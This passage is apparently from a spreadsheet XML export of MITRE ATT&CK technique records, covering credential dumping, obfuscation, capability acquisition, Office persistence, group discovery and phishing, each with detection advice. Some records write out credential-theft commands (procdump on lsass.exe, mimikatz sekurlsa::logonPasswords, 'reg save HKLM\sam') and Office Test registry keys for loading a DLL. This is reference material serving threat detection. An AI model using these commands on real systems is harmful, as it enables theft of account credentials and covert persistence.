    <s v="Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)_x000a__x000a_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_x000a__x000a_With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials._x000a__x000a_Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)"/>
    <s v="https://attack.mitre.org/techniques/T1003/005"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well."/>
    <s v="Windows"/>
    <s v="Command: Command Execution"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.006"/>
    <x v="342"/>
    <s v="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_x000a__x000a_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_x000a__x000a_DCSync functionality has been included in the &quot;lsadump&quot; module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)"/>
    <s v="https://attack.mitre.org/techniques/T1003/006"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="ExtraHop; Vincent Le Toux"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.004"/>
    <x v="343"/>
    <s v="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_x000a__x000a_[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)"/>
    <s v="https://attack.mitre.org/techniques/T1003/004"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Windows Registry: Windows Registry Key Access"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.001"/>
    <x v="344"/>
    <s v="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_x000a__x000a_As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system._x000a__x000a_For example, on the target host use procdump:_x000a__x000a_* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;_x000a__x000a_Locally, mimikatz can be run using:_x000a__x000a_* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;_x000a_* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;_x000a__x000a__x000a_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_x000a__x000a_The following SSPs can be used to access credentials:_x000a__x000a_* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package._x000a_* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)_x000a_* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later._x000a_* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1003/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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_x000a__x000a_On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process._x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.003"/>
    <x v="345"/>
    <s v="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_x000a__x000a_In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)_x000a__x000a_The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes._x000a__x000a_* Volume Shadow Copy_x000a_* secretsdump.py_x000a_* Using the in-built Windows tool, ntdsutil.exe_x000a_* Invoke-NinjaCopy_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1003/003"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-12-14T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.007"/>
    <x v="346"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1003/007"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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s v="Linux"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1003"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.002"/>
    <x v="347"/>
    <s v="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_x000a__x000a_A number of tools can be used to retrieve the SAM file through in-memory techniques:_x000a__x000a_* pwdumpx.exe_x000a_* [gsecdump](https://attack.mitre.org/software/S0008)_x000a_* [Mimikatz](https://attack.mitre.org/software/S0002)_x000a_* secretsdump.py_x000a__x000a_Alternatively, the SAM can be extracted from the Registry with Reg:_x000a__x000a_* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;_x000a_* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;_x000a__x000a_Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)_x000a__x000a_Notes: _x000a_* RID 500 account is the local, built-in administrator._x000a_* RID 501 is the guest account._x000a_* User accounts start with a RID of 1,000+._x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1003/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access"/>
    <b v="1"/>
    <s v="T1003"/>
    <s v="Ed Williams, Trustwave, SpiderLabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1027"/>
    <x v="348"/>
    <s v="Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''&quot;'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) _x000a__x000a_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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Command: Command Execution, File: File Content, File: File Creation, File: File Metadata, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Christiaan Beek, @ChristiaanBeek; Red Canary"/>
    <m/>
    <s v="Application control, Application control by file name or path, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1027.001"/>
    <x v="349"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027/001"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Content, File: File Metadata"/>
    <b v="1"/>
    <s v="T1027"/>
    <s v="Martin Jirkal, ESET"/>
    <m/>
    <s v="Anti-virus, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1027.004"/>
    <x v="350"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027/004"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1027"/>
    <s v="Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"/>
    <m/>
    <s v="Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1027.005"/>
    <x v="351"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027/005"/>
    <d v="2020-03-19T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <m/>
    <b v="1"/>
    <s v="T1027"/>
    <m/>
    <m/>
    <s v="Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1027.002"/>
    <x v="352"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027/002"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2020-02-05T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code."/>
    <s v="Windows, macOS"/>
    <s v="File: File Content, File: File Metadata"/>
    <b v="1"/>
    <s v="T1027"/>
    <s v="Filip Kafka, ESET"/>
    <m/>
    <s v="Anti-virus, Heuristic detection, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1027.003"/>
    <x v="353"/>
    <s v="Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files._x000a__x000a_[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1027/003"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Content"/>
    <b v="1"/>
    <s v="T1027"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588"/>
    <x v="354"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1588"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control."/>
    <s v="PRE"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.003"/>
    <x v="355"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1588/003"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.004"/>
    <x v="356"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)_x000a__x000a_After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control."/>
    <s v="https://attack.mitre.org/techniques/T1588/004"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.005"/>
    <x v="357"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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https://attack.mitre.org/techniques/T1588/005"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="_x000a_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PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.001"/>
    <x v="358"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1588/001"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.002"/>
    <x v="359"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1588/002"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1588.006"/>
    <x v="360"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1588/006"/>
    <d v="2020-10-15T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1588"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137"/>
    <x v="361"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1137"/>
    <d v="2017-12-14T00:00:00"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="1.2"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="Office 365, Windows"/>
    <s v="Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, FireEye; Praetorian; Ricardo Dias; Sahar Shukrun"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.006"/>
    <x v="362"/>
    <s v="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_x000a__x000a_Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. "/>
    <s v="https://attack.mitre.org/techniques/T1137/006"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)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Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.001"/>
    <x v="363"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Word Normal.dotm location:&lt;br&gt;_x000a_&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;_x000a__x000a_Excel Personal.xlsb location:&lt;br&gt;_x000a_&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;_x000a__x000a_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_x000a__x000a_An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros."/>
    <s v="https://attack.mitre.org/techniques/T1137/001"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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
    <s v="Office 365, Windows"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.002"/>
    <x v="364"/>
    <s v="Adversaries may abuse the Microsoft Office &quot;Office Test&quo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_x000a__x000a_There exist user and global Registry keys for the Office Test feature:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;_x000a__x000a_Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started."/>
    <s v="https://attack.mitre.org/techniques/T1137/002"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Consider monitoring Office processes for anomalous DLL loads."/>
    <s v="Office 365, Windows"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.003"/>
    <x v="365"/>
    <s v="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_x000a__x000a_Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)"/>
    <s v="https://attack.mitre.org/techniques/T1137/003"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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Application Log: Application Log Content, Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.004"/>
    <x v="366"/>
    <s v="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_x000a__x000a_Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1137/004"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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Application Log: Application Log Content, Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1137.005"/>
    <x v="367"/>
    <s v="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_x000a__x000a_Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)"/>
    <s v="https://attack.mitre.org/techniques/T1137/005"/>
    <d v="2019-11-07T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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Application Log: Application Log Content, Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1137"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1201"/>
    <x v="368"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1201"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="1.2"/>
    <x v="2"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Sudhanshu Chauhan, @Sudhanshu_C"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1120"/>
    <x v="369"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1120"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1.2"/>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macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1069"/>
    <x v="370"/>
    <s v="Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions."/>
    <s v="https://attack.mitre.org/techniques/T1069"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="2.2999999999999998"/>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Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1069.003"/>
    <x v="371"/>
    <s v="Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group._x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1069/003"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-03-30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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity."/>
    <s v="Azure AD, Google Workspace, IaaS, Office 365, SaaS"/>
    <s v="Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1069"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1069.002"/>
    <x v="372"/>
    <s v="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_x000a__x000a_Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups."/>
    <s v="https://attack.mitre.org/techniques/T1069/002"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="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Process Creation"/>
    <b v="1"/>
    <s v="T1069"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1069.001"/>
    <x v="373"/>
    <s v="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_x000a__x000a_Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups."/>
    <s v="https://attack.mitre.org/techniques/T1069/001"/>
    <d v="2020-03-12T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="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Process Creation"/>
    <b v="1"/>
    <s v="T1069"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1566"/>
    <x v="374"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1566"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2.1"/>
    <x v="15"/>
    <s v="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_x000a__x000a_Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs."/>
    <s v="Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Philip Winther"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1598"/>
    <x v="375"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1598"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="5"/>
    <s v="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_x000a__x000a_When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites._x000a__x000a_Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts)."/>
    <s v="PRE"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1598.002"/>
    <x v="376"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1598/002"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="5"/>
    <s v="Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)"/>
    <s v="PRE"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1598"/>
    <s v="Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1598.003"/>
    <x v="377"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1598/003"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="5"/>
    <s v="Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)_x000a__x000a_Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites."/>
    <s v="PRE"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1598"/>
    <s v="Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1598.001"/>
    <x v="378"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1598/001"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="5"/>
    <s v="Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1598"/>
    <s v="Robert Simmons, @MalwareUtkonos"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1566.001"/>
    <x v="379"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1566/001"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="2.1"/>
    <x v="15"/>
    <s v="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_x000a__x000a_Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)_x000a__x000a_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_x000a__x000a_Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
